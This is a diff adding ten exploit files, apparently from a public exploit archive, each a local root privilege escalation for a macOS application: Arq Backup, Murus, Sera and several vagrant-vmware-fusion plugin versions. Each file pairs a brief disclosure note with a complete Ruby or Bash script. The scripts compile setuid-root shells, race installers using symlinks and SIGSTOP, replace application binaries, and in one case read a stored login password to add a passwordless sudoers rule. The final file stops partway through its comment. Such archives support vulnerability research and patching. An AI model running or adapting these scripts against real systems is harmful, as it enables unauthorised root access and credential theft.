diff --git a/exploits/macos/local/43216.rb b/exploits/macos/local/43216.rb new file mode 100755 index 000000000..579c020d4 --- /dev/null +++ b/exploits/macos/local/43216.rb @@ -0,0 +1,88 @@ +=begin +As well as the other bugs affecting Arq <= 5.9.6 there is also another issue +with the suid-root restorer binaries in Arq for Mac. There are three of them +and they are used to execute restores of backed up files from the various +cloud providers. + +After reversing the inter-app protocol I discovered that the path to the +restorer binary was specified as part of the data packet sent by the UI. After +receiving this, the restorer binaries then set +s and root ownership on this +path. This means we can specify an arbitrary path which will receive +s and root +ownership. + +This issue is fixed in Arq 5.10. +=end + +#!/usr/bin/env ruby + +################################################################## +###### Arq <= 5.9.7 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +################################################################## + +s = File.stat("/Applications/Arq.app/Contents/Resources/standardrestorer") + +if s.mode != 0104755 or s.uid != 0 + puts "Not vulnerable - standardrestorer is not suid root." + exit 1 +end + +binary_target = "/tmp/arq_597_exp" + +d = "\x01\x00\x00\x00\x00\x00\x00\x00" +e = "\x00\x00\x00\x00\x03" +z = "0000" +target = sprintf("%s%s-%s-%s-%s-%s%s%s", z,z,z,z,z,z,z,z) +plist = "<\/dict><\/plist>" +backup_set = "0" * 40 +hmac = "0" * 40 + +payload = sprintf( + "%s%s%s%s\$%s%s\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" + + "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30\x2e\x30" + + "\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s\x00\x00\x00%s" + + "\x00\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00\x00\x00%s\x00\x00" + + "\x00%s\x00\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00\x00\x00\x00\x00\x00" + + "\x14\x00%s\x00\x00\x00\x00\x03%s\x0a", + d, binary_target.length.chr, binary_target, + d, target, + d, plist.length.chr, plist, + d, backup_set, + d, d, d, hmac, + d, d, d, e * 10 + ) + +shellcode = "#include \nint main()\n{ setuid(0);setgid(0);"+ + "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{binary_target};/bin/bash\","+ + "NULL);return 0; }" + +IO.popen("gcc -xc -o #{binary_target} -", mode="r+") do |io| + io.write(shellcode) + io.close +end + +IO.popen("/Applications/Arq.app/Contents/Resources/standardrestorer " + + "2>/dev/null", mode="r+") do |io| + io.getc && io.write(payload) +end + +timeout=3 +i=0 + +while (s = File.stat(binary_target)) && (s.mode != 0104755 or s.uid != 0) + sleep 0.1 + i += 1 + + if i >= (timeout * 10) + break + end +end + +if s.mode == 0104755 and s.uid == 0 + system(binary_target) + exit 0 +end + +puts "exploit failed" \ No newline at end of file diff --git a/exploits/macos/local/43217.sh b/exploits/macos/local/43217.sh new file mode 100755 index 000000000..2204ea940 --- /dev/null +++ b/exploits/macos/local/43217.sh @@ -0,0 +1,89 @@ +# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus +# firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings. + +# If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access +# without the user knowing. + +# https://m4.rkw.io/murus1.4.11.sh.txt +# 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301 +# ------------------------------------------------------------------------------- +#!/bin/bash + +################################################################## +###### Murus 1.4.11 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +################################################################## + +echo "compiling payloads..." + +cat > /tmp/murus411_exp.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL); + return 0; +} +EOF + +gcc -o /tmp/murus411_exp /tmp/murus411_exp.c + +if [ ! $? -eq 0 ] ; then + rm -f /tmp/murus411_exp.c + echo "failed to compile, dev tools may not be installed" + exit 1 +fi + +rm -f /tmp/murus411_exp.c + +cat > /tmp/murus411_exp2.c < +#include +int main() +{ + setuid(0); + seteuid(0); + system("chown root:wheel /tmp/murus411_exp"); + system("chmod 4755 /tmp/murus411_exp"); + system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\ +Murus.app/Contents/MacOS/Murus"); + execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL); + return 0; +} +EOF + +gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c +rm -f /tmp/murus411_exp2.c + +echo "waiting for loader..." + +while : +do + ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \ + |grep -v grep 1>/dev/null + if [ $? -eq 0 ] ; then + break + fi +done + +echo "planting payload..." + +mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\ +Contents/MacOS/Murus.orig +mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus + +echo "waiting for payload to trigger..." + +while : +do + r=`ls -la /tmp/murus411_exp |grep root` + if [ "$r" != "" ] ; then + break + fi + sleep 0.1 +done + +echo "kapow" + +/tmp/murus411_exp \ No newline at end of file diff --git a/exploits/macos/local/43218.sh b/exploits/macos/local/43218.sh new file mode 100755 index 000000000..0987fdfc7 --- /dev/null +++ b/exploits/macos/local/43218.sh @@ -0,0 +1,78 @@ +# Arq Backup from Haystack Software is a great application for backing up macs and +# windows machines. Unfortunately versions of Arq for mac before 5.9.7 are +# vulnerable to a local root privilege escalation exploit. + +# The updater binary has a "setpermissions" function which sets the suid bit and +# root ownership on itself but it suffers from a race condition that allows you to +# swap the destination for these privileges using a symlink. + +# We can exploit this to get +s and root ownership on any arbitrary binary. + +# Other binaries in the application also suffer from the same issue. + +# This was fixed in Arq 5.9.7. + +# https://m4.rkw.io/arq_5.9.6.sh.txt +# 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d +# ------------------------------------------------------------------------------ +#!/bin/bash + +################################################################## +###### Arq <= 5.9.6 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html #### +################################################################## + +vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\ +Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \ +|grep root` + +cwd="`pwd`" + +if [ "$vuln" == "" ] ; then + echo "Not vulnerable - auto-updates not enabled." + exit 1 +fi + +cat > arq_596_exp.c < +int main() +{ + setuid(0); + seteuid(0); + execl( + "/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash", + NULL + ); + return 0; +} +EOF + +gcc -o arq_596_exp arq_596_exp.c +rm -f arq_596_exp.c + +ln -s /Applications/Arq.app/Contents/Library/LoginItems/\ +Arq\ Agent.app/Contents/Resources/arq_updater + +./arq_updater setpermissions &>/dev/null& +rm -f ./arq_updater +mv arq_596_exp ./arq_updater + +i=0 +timeout=10 + +while : +do + r=`ls -la ./arq_updater |grep root` + if [ "$r" != "" ] ; then + break + fi + sleep 0.1 + i=$((i+1)) + if [ $i -eq $timeout ] ; then + rm -f ./arq_updater + echo "Not vulnerable" + exit 1 + fi +done + +./arq_updater \ No newline at end of file diff --git a/exploits/macos/local/43219.sh b/exploits/macos/local/43219.sh new file mode 100755 index 000000000..ee04dfeb5 --- /dev/null +++ b/exploits/macos/local/43219.sh @@ -0,0 +1,161 @@ +# Another day, another root privesc bug in this plugin. Not quite so serious this +# time - this one is only exploitable if the user has the plugin installed but +# VMware Fusion *not* installed. This is a fairly unlikely scenario but it's a +# straight to root privesc with no user interaction so isn't the kind of thing +# that should be shipping with any software. + +# This occurs because the suid root sudo helper that I have discussed in previous +# exploit writeups executes /Applications/VMware +# Fusion.app/Contents/Library/vmnet-cli +# as root, but if the application isn't installed and we're a local admin user we +# can create a fake app directory with a payload in place of vmnet-cli that gets +# executed as root. + +# HashiCorp fixed this (very quickly) in 5.0.4. + +# https://m4.rkw.io/vagrant_vmware_privesc_5.0.3.sh.txt +# 3c11083386b3f7352d60b327190eed4364383c0622351db5410d809f4bda746a +# ------------------------------------------------------------------------------ +#!/bin/bash +echo +echo "#########################################################" +echo "# vagrant_vmware_fusion plugin 5.0.3 local root privesc #" +echo "# by m4rkw - https://m4.rkw.io/blog.html #"; +echo "#########################################################" +echo "# Note: only works when VMWare Fusion is not installed. #" +echo "#########################################################" +echo + +cleanup() { + exec 2> /dev/null + killall -9 vagrant 1>/dev/null 2>/dev/null + kill -9 `ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2` &>/dev/null + exec 2> /dev/tty + cd + rm -rf .vagrant_vmware_fusion_503_exp + rm -rf /Applications/VMware\ Fusion.app +} + +if [ -e "/Applications/VMware Fusion.app" ] ; then + echo "Fusion is installed, not exploitable." + exit 1 +fi + +echo "setting up fake app directory..." + +mkdir /Applications/VMware\ Fusion.app +if [ ! $? -eq 0 ] ; then + echo "Failed to create /Applications/VMware Fusion.app." + exit 1 +fi + +mkdir -p /Applications/VMware\ Fusion.app/Contents/Library/services + +touch /Applications/VMware\ Fusion.app/Contents/Library/vmrun +touch /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services +chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmrun +chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services + +cat > /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx <&2 +echo "VMware Fusion Information:" 1>&2 +echo "VMware Fusion 10.0.1 build-6754183 Release" 1>&2 +echo +EOF + +chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx + +cat > /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli < /tmp/vvp_503.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","rm -f /tmp/vvp_503; /bin/bash",NULL); + return 0; +} +EOF +gcc -o /tmp/vvp_503 /tmp/vvp_503.c +rm -f /tmp/vvp_503.c + +cd +mkdir .vagrant_vmware_fusion_503_exp +cd .vagrant_vmware_fusion_503_exp + +echo "writing dummy vagrantfile ..." + +cat > vagrantfile </dev/null & + +while : +do + r=`ps auxwww |grep 'vagrant up' |grep -v grep` + if [ "$r" == "" ] ; then + break + fi + sleep 0.5 +done + +echo "dropping dummy machine..." + +uuid=`ls -1 .vagrant/machines/default/vmware_fusion |grep -v vagrant_cwd` +touch .vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx +echo -n "`pwd`/.vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx" > .vagrant/machines/default/vmware_fusion/id + +echo "triggering vagrant up [stage 2]..." + +vagrant up &>/dev/null & + +echo "waiting for payload to trigger ..." + +count=0 +success=0 + +while : +do + r=`ls -la /tmp/vvp_503 |grep -- '-rwsr-xr-x 1 root wheel'` + if [ "$r" != "" ] ; then + success=1 + break + fi + r=`ps auxwww |grep 'vagrant up' |grep -v grep` + if [ "$r" == "" ] ; then + break + fi + sleep 0.2 + count=$(($count + 1)) + if [ $count -eq 250 ] ; then + echo "Timed out waiting for the payload to trigger." + cleanup + exit 1 + fi +done + +cleanup + +if [ ! $success -eq 1 ] ; then + echo "exploit failed." + exit 1 +fi + +echo +cd +/tmp/vvp_503 \ No newline at end of file diff --git a/exploits/macos/local/43220.sh b/exploits/macos/local/43220.sh new file mode 100755 index 000000000..92d1d61aa --- /dev/null +++ b/exploits/macos/local/43220.sh @@ -0,0 +1,79 @@ +# I recently blogged about how the installation process of version 5.0.0 of this +# plugin could be hihacked by a local attacker or malware in order to escalate +# privileges to root. Hashicorp pushed some mitigations for this issue fairly +# quickly but unfortunately 5.0.1 is still exploitable with a slightly different +# approach. + +# They removed the chmod/chown shell commands from their osascript invocation and +# instead simply executed their installer as root, but apparently didn't realise +# that the installer is not root-owned so can be swapped out by a local attacker +# during the process. + +# This issue is fixed in version 5.0.2. + +# https://m4.rkw.io/vagrant_vmware_privesc_5.0.1.sh.txt +# c38ecc9fdb4f37323338e8fd12b851133a2121f3505cde664e6d32f1ef49ba23 +# ----------------------------------------------------------------------------- +#!/bin/bash +echo "########################################" +echo "vagrant_vmware_fusion 5.0.1 root privesc" +echo "by m4rkw" +echo "########################################" +echo +echo "compiling..." + +cat > vvf.c < +#include +#include +int main(int ac, char *av[]) +{ + setuid(0); + seteuid(0); + if (ac > 1) { + system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 /tmp/vvf_exp"); + system("chown root:wheel /tmp/vvf_exp"); + system("chmod 4755 /tmp/vvf_exp"); + system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64.orig $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64"); + system("$HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 install\012"); + return 0; + } + system("rm -f /tmp/vvf_exp"); + execl("/bin/bash","bash",NULL); + return 0; +} +EOF + +gcc -o /tmp/vvf_exp vvf.c +rm -f vvf.c + +echo "waiting for user to initiate vagrant plugin update..." + +while : +do + r=`ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant-vmware-installer_darwin_amd64'` + if [ "$r" != "" ] ; then + break + fi +done + +pid=`ps auxww |grep './vagrant-vmware-installer_darwin_amd64 install' |grep -v grep |xargs -L1 |cut -d ' ' -f2` + +cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop + +echo "dropping payload in place of installer binary..." + +mv -f vagrant-vmware-installer_darwin_amd64 vagrant-vmware-installer_darwin_amd64.orig +mv -f /tmp/vvf_exp vagrant-vmware-installer_darwin_amd64 + +echo "waiting for payload to trigger..." + +while : +do + r=`ls -la /tmp/vvf_exp 2>/dev/null |grep -- '-rwsr-xr-x' |grep root` + if [ "$r" != "" ] ; then + echo "spawning shell..." + /tmp/vvf_exp + exit 0 + fi +done \ No newline at end of file diff --git a/exploits/macos/local/43221.sh b/exploits/macos/local/43221.sh new file mode 100755 index 000000000..8a38e248a --- /dev/null +++ b/exploits/macos/local/43221.sh @@ -0,0 +1,46 @@ +# Sera is a free app for mac and iOS that lets you unlock your mac automatically +# when your iphone is within a configured proximity. + +# Unfortunately to facilitate this it stores the users login password in their +# home directory at: + +# ~/Library/Preferences/no.ignitum.SeraOSX.plist + +# This makes root privilege escalation trivial and worse than that even +# facilitates dumping the keychain as we can easily obtain the user's login +# password. If they are an admin user we can even dump items from the system +# keychain. + +# The author of Sera has said he will shut the project down and make the code +# publicly available so no fix is likely to be forthcoming anytime soon. + +# It is strongly recommended not to use this app and if you have done so in the +# past make sure you remove this file that contains your login password. + +# https://m4.rkw.io/sera_1.2.sh.txt +# dbf4f7b64cac8a60a2c7b3ba2a3988b84a148a3f6e31bcb58d4554e5e74d8edf +# ------------------------------------------------------------------------- +#!/bin/bash + +############################################################## +###### sera 1.2 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +############################################################## + +sera_pass=`plutil -p ~/Library/Preferences/no.ignitum.SeraOSX.plist |grep '"sera_pass"' |cut -d '"' -f4` + +if [ "$sera_pass" == "" ] ; then + echo "Password not found." + exit 1 +fi + +echo "user's password is: $sera_pass" + +user="`whoami`" + +echo "$user ALL=(ALL) NOPASSWD:ALL" > /tmp/sera_12_exp + +echo "$sera_pass" | sudo -S chown root:wheel /tmp/sera_12_exp 1>/dev/null 2>/dev/null +echo "$sera_pass" | sudo -S mv /tmp/sera_12_exp /etc/sudoers.d/sera_12_exp 1>/dev/null 2>/dev/null + +sudo bash -c 'rm -f /etc/sudoers.d/sera_12_exp; /bin/bash' \ No newline at end of file diff --git a/exploits/macos/local/43222.sh b/exploits/macos/local/43222.sh new file mode 100755 index 000000000..c030a64cb --- /dev/null +++ b/exploits/macos/local/43222.sh @@ -0,0 +1,108 @@ +# After three CVEs and multiple exploits disclosed to Hashicorp they have finally upped their game with this plugin. Now the previously vulnerable non-root-owned +# ruby code that get executed as root by the sudo helper is no more and the sudo helper itself is one static Go binary with tightly-controlled parameters that +# can't (as far as I can tell) be exploited on its own. + +# However I have discovered that the update mechanism in 5.0.0 is not completely safe. There is a bug in the update mechanism for 5.0.0 that makes it reinstall +# the plugin when you run: + +# $ vagrant plugin update + +# even if there is no update pending. The reinstall includes replacing the sudo helper and re-applying root ownership and the suid bit. This is done via +# osascript with a block of shell as an easy way to show a graphical popup authentication dialog to the user. + +# After the credentials are entered and the permissions are applied the installer for the plugin immediately checks the hash of the sudo helper binary and if it +# doesn't match it removes it. On the surface this seemed to make a race condition impossible however after some poking around I found a way to exploit it. + +# Because the authentication prompt is a guarantee of at least a few seconds pause in the intallation, we can catch this point in time very easily by scanning the +# process list watching for the invocation of osascript. Once we see this we can lay a trap by replacing the sudo helper binary with an exploit payload (remember +# this is always in a non-root-owned directory). + +# As soon as the privileges are set vagrant will execute its checksum and remove the payload, however because we've caught execution at the right time and +# because the installer is a different process from the osascript process we can send a STOP signal to the installer to pause its execution. This means osascript +# will set the permissions and then the installer will not immediately remove the binary, giving us time to move our newly suid-root'd payload out of the way, use +# it to obtain root privileges, and then move the real sudo helper back into place and chmod +s it ourselves so that vagrant doesn't realise anything bad has +# happened. + +# This all takes place in a second or two so the user is unlikely to notice either. Once this is done we simply send a CONT signal to the installer to allow +# it to continue as normal. The plugin is installed correctly with the right permissions, the user didn't see any errors or warnings, and we have an suid +# root payload that we can execute to spawn a root shell. + +# This issue is fixed in version 5.0.1. + +# https://m4.rkw.io/vagrant_vmware_privesc_5.0.0.sh.txt +# cdbdf9e620eba0d897a3ef92b6872dbb0b194eaf548c23953a42678a566f71f0 +# ------------------------------------------------------------------------------- +#!/bin/bash +echo "########################################" +echo "vagrant_vmware_fusion 5.0.0 root privesc" +echo "by m4rkw" +echo "########################################" +echo +echo "compiling..." + +cat > vvf.c < +#include +#include +int main(int ac, char *av[]) +{ + setuid(0); + seteuid(0); + if (ac > 1) { + system("chown root vagrant_vmware_desktop_sudo_helper_darwin_amd64"); + system("chmod 4755 vagrant_vmware_desktop_sudo_helper_darwin_amd64"); + return 0; + } + system("rm -f /tmp/vvf_exp"); + execl("/bin/bash","bash",NULL); + return 0; +} +EOF + +gcc -o /tmp/vvf_exp vvf.c +rm -f vvf.c + +echo "waiting for user to initiate vagrant plugin update..." + +while : +do + r=`ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant_vmware_desktop_sudo_helper_darwin_amd64'` + if [ "$r" != "" ] ; then + break + fi +done + +pid=`ps auxww |grep './vagrant-vmware-installer_darwin_amd64' |grep -v grep |xargs -L1 |cut -d ' ' -f2` + +echo "pausing installer..." + +kill -STOP $pid + +cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.0/bin + +echo "dropping payload in place of sudo helper binary..." + +mv -f vagrant_vmware_desktop_sudo_helper_darwin_amd64 vagrant_vmware_desktop_sudo_helper_darwin_amd64.orig +mv -f /tmp/vvf_exp vagrant_vmware_desktop_sudo_helper_darwin_amd64 + +echo "waiting for suid..." + +while : +do + r=`ls -la vagrant_vmware_desktop_sudo_helper_darwin_amd64 |grep -- '-rwsr-xr-x' |grep root` + if [ "$r" != "" ] ; then + echo "moving the real helper back into place..." + mv -f ./vagrant_vmware_desktop_sudo_helper_darwin_amd64 /tmp/vvf_exp + mv -f vagrant_vmware_desktop_sudo_helper_darwin_amd64.orig vagrant_vmware_desktop_sudo_helper_darwin_amd64 + + echo "fixing perms..." + /tmp/vvf_exp 1 + + echo "allow vagrant to continue..." + kill -CONT $pid + + echo "spawning shell..." + /tmp/vvf_exp + exit 0 + fi +done \ No newline at end of file diff --git a/exploits/macos/local/43223.sh b/exploits/macos/local/43223.sh new file mode 100755 index 000000000..daaeb719c --- /dev/null +++ b/exploits/macos/local/43223.sh @@ -0,0 +1,219 @@ +# I have previously disclosed a couple of bugs in Hashicorp's vagrant-vmware-fusion plugin for vagrant. + +# Unfortunately the 4.0.23 release which was supposed to fix the previous bug I reported didn't address the issue, so Hashicorp quickly put out another release +# - 4.0.24 - after that (but didn't update the public changelog on github). + +# Unfortunately 4.0.24 is still vulnerable, largely due to a fundamental design flaw in the way the plugin is written combined with the need to elevate +# privileges for certain functions within Fusion. + +# Because Hashicorp need users to be able to update the plugin as the local non-root user the encrypted ruby code that the plugin is comprised of must +# remain owned by the non-root user. This means there is a huge attack surface that we can exploit to manipulate the execution of the program and still get +# root on 4.0.24. + +# I wrote this exploit before Fusion 10 was released and on the surface 4.0.24 is not compatible with Fusion 10. Curiously though it can be fairly easily tricked +# into working (at least partially) with Fusion 10 simply by patching out the version check and creating a symlink. I discovered this while trying to get the +# 4.0.24 exploit working with Fusion 10 installed - we can simply monkey-patch the version check out of the code, create a symlink for a binary that VMWare +# moved in v10 and then we're away. I was able to vagrant up and ssh into the running vm without any issues. It also means I was able to update the exploit so +# that it works on Fusion 8.x and Fusion 10. + +# This seems to be (finally!) fixed properly in 4.0.25 by replacing the suid helper binary with a new go binary that contains all the required elevated +# operations and doesn't call back to the vulnerable ruby code. + +# https://m4.rkw.io/vagrant_vmware_privesc_4.0.24_v8-10.sh.txt +# 30d54139620bf8e805805d34aa54f4f348b7371642828b28cd0f8c5a7a65c0e8 +# ----------------------------------------------------------------------------- +#!/bin/bash +echo +echo "**********************************************************" +echo "* vagrant_vmware_fusion plugin 4.0.24 local root privesc *" +echo "* by m4rkw - https://m4.rkw.io/blog.html *"; +echo "**********************************************************" +echo "* works against vmware fusion 8.x and 10.x - even though *" +echo "* 4.0.24 is not compatible with 10.x, we patch out the *" +echo "* version check ;) *" +echo "**********************************************************" +echo + +cleanup() { + exec 2> /dev/null + killall -9 vagrant 1>/dev/null 2>/dev/null + kill -9 `ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2` &>/dev/null + exec 2> /dev/tty + x=`pwd |sed 's/.*\///'` + if [ "$x" == ".vagrant_vmware_fusion_4024_exp" ] ; then + cd .. + rm -rf .vagrant_vmware_fusion_4024_exp + fi + cd + rm -rf .vagrant_vmware_fusion_4024_exp + if [ -e "$target1.bak" ] ; then + mv -f $target1.bak $target1 + fi + if [ -e "$target2.orig" ] ; then + mv -f $target2.orig $target2 + fi +} + +vuln=`find ~/.vagrant.d//gems/2.3.4/gems/vagrant-vmware-fusion-4.0.24/bin -type f -perm +4000` + +if [ "$vuln" == "" ] ; then + echo "Vulnerable suid binary not found. It gets +s after the first vagrant up." + exit 1 +fi + +mkdir .vagrant_vmware_fusion_4024_exp +cd .vagrant_vmware_fusion_4024_exp + +echo "Looking for a vmware_desktop vagrant box ..." + +box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1` + +download=0 + +if [ "$box" == "" ] ; then + download=1 + echo "No box found, defaulting to envimation/ubuntu-xenial ..." + box="envimation/ubuntu-xenial" +fi + +echo "Writing a dummy vagrantfile ..." + +cat > vagrantfile < /tmp/v.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","rm -f /tmp/v; /bin/bash",NULL); + return 0; +} +EOF2 +gcc -o /tmp/v /tmp/v.c +rm -f /tmp/v.c + +echo "Looking for the sudo_helper_cli.rb ..." + +target1=`find ~/.vagrant.d/ -name sudo_helper_cli.rb |grep vagrant-vmware-fusion-4.0.24` + +if [ $target1 == "" ] ; then + cleanup + echo "sudo_helper_cli.rb version 4.0.24 not found" + exit 1 +fi + +echo "Installing ruby payload ..." + +if [ ! -e "$target1.bak" ] ; then + mv -f $target1 $target1.bak + if [ ! $? -eq 0 ] ; then + cleanup + echo "Unable to rename $target1, may not be exploitable." + exit 1 + fi +fi + +cat > $target1 <&1 |grep 'VMware Fusion 10.'` + +if [ "$vc" != "" ] ; then + echo "Fusion 10.x detected, Patching out the version check ..." + + target2=`find ~/.vagrant.d/ -name driver.rb |grep vagrant-vmware-fusion-4.0.24` + + if [ "$target2" == "" ] ; then + cleanup + echo "driver.rb version 4.0.24 not found" + exit 1 + fi + + if [ ! -e "$target2.orig" ] ; then + mv -f $target2 $target2.orig + if [ ! $? -eq 0 ] ; then + cleanup + echo "Unable to rename $target2, may not be exploitable." + exit 1 + fi + fi + + cat > $target2 </dev/null & + +success=0 + + +if [ $download -eq 1 ] ; then + echo "*** we need to download the vmware box so this will take a minute or two ***" +fi + +echo "Waiting for payload to trigger ..." + +count=0 + +while : +do + r=`ls -la /tmp/v |grep -- '-rwsr-xr-x 1 root wheel'` + if [ "$r" != "" ] ; then + success=1 + break + fi + r=`ps auxwww |egrep '\/vagrant up$'` + if [ "$r" == "" ] ; then + break + fi + sleep 0.2 + count=$(($count + 1)) + if [ $count -eq 150 ] ; then + echo "Timed out waiting for the payload to trigger." + cleanup + exit 1 + fi +done + +cleanup + +if [ ! $success -eq 1 ] ; then + echo "Exploit failed." + exit 1 +fi + +echo + +/tmp/v \ No newline at end of file diff --git a/exploits/macos/local/43224.sh b/exploits/macos/local/43224.sh new file mode 100755 index 000000000..30ac0a173 --- /dev/null +++ b/exploits/macos/local/43224.sh @@ -0,0 +1,138 @@ +# A couple of weeks ago I disclosed a local root privesc in Hashicorp's +# vagrant-vmware-fusion plugin: +# +# https://m4.rkw.io/blog/cve20177642-local-root-privesc-in-hashicorp-vagrantvmw... +# +# The initial patch they released was 4.0.21 which unfortunately contained a bug +# that prevented it from working at all on mac systems so I was unable to test it. +# I then had to give my mac to Apple for a couple of weeks for some repairs so +# only got around to testing 4.0.22 at the end of last week. +# +# Unfortunately, 4.0.22 is still exploitable and the subsequent release of 4.0.23 +# did not fix the issue. Hashicorp reacted much faster this time, taking only a +# few days to issue a patch instead of a few months and 4.0.24 does fix the issue. +# +# As discussed before the plugin installs a "sudo helper" encrypted ruby script +# and four architecture-specific wrappers into +# ~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin +# +# vagrant_vmware_desktop_sudo_helper +# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386 +# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 +# vagrant_vmware_desktop_sudo_helper_wrapper_linux_386 +# vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64 +# +# The wrapper that matches the system architecture will be made suid root the +# first time any vagrant box is up'd. When a vagrant box is started the wrapper +# script elevates privileges and then executes the ruby sudo helper script. +# +# Previously I exploited the unsanitised system("ruby") call to simply invoke the +# wrapper directly and execute an arbitrary fake "ruby" script in the current PATH. +# This is now mitigated with 4.0.22 because the wrapper refuses to execute if it's +# not being called by vagrant. +# +# Unfortunately it's still possible to exploit it because the wrapper executes the +# sudo helper as root, and the sudo helper is not root-owned so we can overwrite it +# with any arbitrary ruby code which will then get executed as root when vagrant up +# is run. +# +# The issue was reported to Hashicorp on 27/07/17 and fixed on 01/08/17. +# +# This exploit requires a vmware_fusion box to be present on the system in order to +# work. If you don't have one it may take a few minutes to download one. Like +# last time it targets darwin 64bit but it's likely the other architectures are +# vulnerable too. +# +# https://m4.rkw.io/vagrant_vmware_privesc_4.0.23.sh.txt +# 81c2637cd1f4064c077aabc6fa7a3451ae3f2bd99c67f25c966728f88a89d5a1 +# -------------------------------------------------------------------------- + +#!/bin/bash +echo +echo "****************************************************************" +echo "* Wooo vmware_fusion plugin 4.0.22-4.0.23 is still exploitable *" +echo "* m4rkw *" +echo "****************************************************************" +echo +echo "Shouts to #coolkids" +echo + +vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1` +target="/tmp/vagrant_vmware_privesc_4.0.23" + +if [ "$vuln_bin" == "" ] ; then + echo "Vulnerable binary not found." + exit 1 +fi + +if [ -e "$target" ] ; then + echo "Exploit payload already present." + $target + exit +fi + +box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1` + +if [ "$box" == "" ] ; then + echo "No vmware_fusion boxes found locally, we will have to download one." + echo + echo "This will take a few minutes." + echo + box="bento/ubuntu-16.04" +fi + +dir=`dirname "$vuln_bin"` + +cd "$dir" + +if [ ! -e "vagrant_vmware_desktop_sudo_helper.bak" ] ; then + mv vagrant_vmware_desktop_sudo_helper vagrant_vmware_desktop_sudo_helper.bak +fi + +cat > $target.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","/bin/bash;rm -f $target",NULL); + return 0; +} +EOF +gcc -o $target $target.c +rm -f $target.c + +cat > vagrant_vmware_desktop_sudo_helper < vagrantfile </dev/null & + +while : +do + r=`ls -la $target |grep -- '-rwsr-xr-x 1 root wheel'` + if [ "$r" != "" ] ; then + break + fi + sleep 0.2 +done + +killall -9 vagrant + +echo +echo "Sorry Hashicorp.. still fail :P" +echo + +sleep 1 +cd +$target \ No newline at end of file diff --git a/exploits/macos/local/43225.sh b/exploits/macos/local/43225.sh new file mode 100755 index 000000000..3bbf070b3 --- /dev/null +++ b/exploits/macos/local/43225.sh @@ -0,0 +1,87 @@ +# With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader +# binary that ships with Proxifier <= 2.18. +# +# Unfortunately 